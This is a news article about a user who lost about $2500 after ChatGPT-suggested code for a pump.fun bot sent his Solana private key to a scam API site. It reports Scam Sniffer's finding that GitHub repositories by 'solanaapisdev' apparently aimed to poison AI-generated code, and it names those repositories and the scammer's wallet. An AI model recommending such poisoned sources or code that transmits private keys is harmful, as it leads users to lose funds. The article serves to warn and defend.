There is no evidence to indicate whether it was a deliberate poisoning directed at GPT, or if GPT actively collected it.
Written by: shushu
Recently, a user encountered online fraud while trying to develop an automatic posting bot for pump.fun and sought code help from ChatGPT, only to unexpectedly fall victim to a scam. This user followed the code instructions provided by ChatGPT and accessed a recommended Solana API website. However, this site was actually a scam platform, resulting in a loss of approximately $2500.
According to the user's description, part of the code requires submitting the private key via API. Due to being busy, the user used his main Solana wallet without review. In hindsight, he realizes he made a serious mistake, but at the time, his trust in OpenAI made him overlook the potential risks.
After using the API, the scammers quickly took action, transferring all assets from the user's wallet to the address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX in just 30 minutes. Initially, the user did not fully confirm that there was a problem with the website, but after closely inspecting the homepage of the domain, he found obvious suspicious signs.
Currently, this user is calling on the community to help block this @solana website and remove relevant information from the @OpenAI platform to prevent more people from being harmed. He also hopes to bring the scammers to justice by investigating the clues left by the other party.
Scam Sniffer discovered malicious code repositories aimed at stealing private keys through AI-generated code.
• solanaapisdev/moonshot-trading-bot
• solanaapisdev/pumpfun-api
Github user 'solanaapisdev' has created multiple code repositories in the past 4 months, attempting to guide AI to generate malicious code.
The reason this user's private key was stolen is that it was directly sent to the phishing website in the HTTP request body.
The founder of Slow Mist, Yu Xian, stated, 'These are all very unsafe practices, various forms of 'poisoning'. Not only uploading private keys but also helping users generate private keys online for them to use. The documentation is also written in a pretentious manner.'
He also mentioned that the contact information for these malicious code websites is very limited, the official website has no content, primarily consisting of documentation + code repositories. 'The domain was registered at the end of September, which inevitably raises suspicions of premeditated poisoning, but there is no evidence to indicate whether it was a deliberate poisoning directed at GPT, or if GPT actively collected it.'
Scam Sniffer offers security suggestions for code created with AI assistance, including:
• Never blindly use AI-generated code
• Always carefully review the code
• Keep private keys in an offline environment
• Only use trusted sources